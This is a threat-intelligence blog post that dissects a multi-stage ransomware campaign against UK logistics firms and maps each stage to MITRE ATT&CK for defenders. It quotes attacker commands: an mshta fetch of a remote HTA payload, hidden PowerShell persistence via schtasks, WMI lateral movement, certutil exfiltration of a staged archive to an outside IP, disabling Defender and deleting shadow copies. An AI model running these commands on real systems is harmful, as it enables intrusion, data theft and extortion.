← All Posts
Threat Intel Analysis

Inside a Modern Ransomware Campaign: Anatomy of a Multi-Stage Attack

12 January 2025 14 min read by birenk

Ransomware campaigns targeting UK-based organisations have grown increasingly sophisticated over the past two years. What used to be opportunistic spray-and-pray operations have evolved into deliberate, multi-week intrusions with dedicated initial access brokers, affiliate programmes, and double-extortion playbooks. This post walks through the full kill chain of a campaign I tracked over Q4 2024 — from initial access through to the encryption event — mapping each stage to MITRE ATT&CK and pulling apart the tooling involved.

Note: All IOCs have been sanitised or generalised. This write-up is for educational purposes only.

Initial Access: The Phishing Lure

The campaign opened with a targeted spearphishing email sent to finance and HR staff at mid-sized logistics firms. The lure masqueraded as an urgent HMRC self-assessment document, complete with a convincing HTML email template. Attached was a password-protected ZIP containing an ISO file — a now-common technique to bypass Mark-of-the-Web (MotW) controls on Windows.

Inside the ISO sat a single .lnk shortcut file. When executed, it ran a mshta.exe one-liner pulling an HTA payload from an attacker-controlled domain registered just 48 hours prior:

mshta.exe http://cdn-updates[.]network/doc.hta

The HTA dropped a stager written in JScript that performed basic environment checks — looking for sandbox artefacts, VM vendor strings in the registry, and the presence of security tooling processes — before retrieving the second-stage payload. This kind of sandbox-aware staging is increasingly common and speaks to the professionalism of the group behind this campaign.

ATT&CK mapping: T1566.001 (Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1218.005 (Mshta)

Establishing Persistence: Cobalt Strike Beacon

The second stage was a Cobalt Strike Beacon configured to communicate over HTTPS on port 443, using a malleable C2 profile that mimicked Microsoft Teams traffic. The profile set the User-Agent to a legitimate Teams client string and structured the URI paths to match Teams API endpoints. This kind of traffic blending is designed to evade network-level detection.

Beacon was injected into a legitimate svchost.exe process via process hollowing, and persistence was established through a scheduled task that executed a PowerShell script from a user-writable directory:

schtasks /create /tn "MicrosoftEdgeUpdate" /tr "powershell -w hidden -ep bypass -f C:\Users\Public\update.ps1" /sc onlogon /ru SYSTEM

The naming convention here — impersonating a browser update task — is a classic living-off-the-land technique. Defenders checking scheduled tasks will often skim past entries with familiar-sounding names, especially in busy environments.

ATT&CK mapping: T1055.012 (Process Hollowing), T1053.005 (Scheduled Task), T1071.001 (Web Protocols C2)

Discovery and Lateral Movement

Once foothold was established, the operator spent approximately three days conducting internal reconnaissance before moving laterally. This dwell time is typical of ransomware-as-a-service (RaaS) affiliates who need to map the environment before deploying the final payload.

Discovery commands were run via Beacon's built-in capabilities and via net.exe calls to enumerate domain users, administrators, and trust relationships:

net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
nltest /domain_trusts
net view /all /domain

BloodHound data was collected using SharpHound, exfiltrated over the existing C2 channel, and used to identify the shortest privilege escalation paths to Domain Admin. In this case, a misconfigured Group Policy Object (GPO) applied to a sub-OU allowed any authenticated user to modify the GPO — a classic GenericWrite abuse path.

Lateral movement was conducted primarily through pass-the-hash (PTH) using harvested NTLM hashes from LSASS memory, dumped via a custom reflective DLL that avoided direct MiniDumpWriteDump calls to bypass common AV hooks. WMI was used to move between hosts:

wmic /node:TARGETHOST process call create "cmd /c whoami > C:\Windows\Temp\out.txt"

ATT&CK mapping: T1087.002 (Domain Account Discovery), T1484.001 (GPO Modification), T1550.002 (Pass the Hash), T1047 (WMI)

Data Exfiltration

Prior to encryption — consistent with double-extortion tactics — the operators exfiltrated approximately 80GB of data. Sensitive directories targeted included finance shares, HR records, and project documentation. Data was staged locally in a compressed archive before being transferred out:

7za.exe a -p[REDACTED] -mmt4 staged.7z "\\FILESERVER\Finance\*"
certutil -urlcache -f -split http://185.x.x.x/upload.php staged.7z

The use of certutil for exfiltration is a well-documented LOLBIN technique. Despite its age, it continues to appear in real-world intrusions — presumably because many organisations still don't alert on it. The receiving infrastructure was hosted on a bulletproof hosting provider in Eastern Europe with no abuse response.

ATT&CK mapping: T1560.001 (Archive Collected Data), T1105 (Ingress Tool Transfer used inversely for exfil), T1048 (Exfiltration Over Alternative Protocol)

The Encryption Event

On day 11 of the intrusion, the ransomware payload was deployed. The binary — a variant consistent with the BlackCat/ALPHV affiliate ecosystem — was pushed via GPO to all domain-joined hosts and executed simultaneously. The payload used intermittent encryption (encrypting only portions of files) to maximise speed across the estate, completing encryption of roughly 2,000 endpoints in under four hours.

Volume shadow copies were deleted via vssadmin and wmic shadowcopy, and Windows Defender real-time protection was disabled via PowerShell prior to deployment:

Set-MpPreference -DisableRealtimeMonitoring $true
vssadmin delete shadows /all /quiet

Ransom notes were dropped to every encrypted directory, with a unique victim ID and a link to a .onion negotiation portal.

ATT&CK mapping: T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery), T1562.001 (Impair Defenses)

Observations and Takeaways

A few things stand out about this campaign when viewed end-to-end:

  • The dwell time is the opportunity. Eleven days between initial access and encryption is plenty of time for defenders to detect and evict. Most of the early-stage activity — HTA execution, scheduled task creation, SMB lateral movement — generates events that are visible in Windows Event Logs and EDR telemetry. The question is always whether anyone is looking.
  • Living-off-the-land is the norm, not the exception. The operators leaned heavily on built-in Windows utilities throughout. Detections that rely solely on signature-based AV will miss the bulk of this activity.
  • GPO misconfiguration was the pivot point. A single over-permissioned GPO enabled domain compromise. Regular BloodHound runs in your own environment to find these paths before an attacker does is time well spent.
  • Double extortion changes the recovery calculus. Even organisations with solid backups face significant pressure once sensitive data is in the attacker's hands. Data loss prevention and egress monitoring matter as much as endpoint detection here.

If you're running threat hunts on the back of this, the early indicators — ISO/LNK delivery, mshta network connections, schtasks with suspicious names, and SharpHound artefacts on disk — are your best chances of catching the intrusion before it reaches the encryption stage.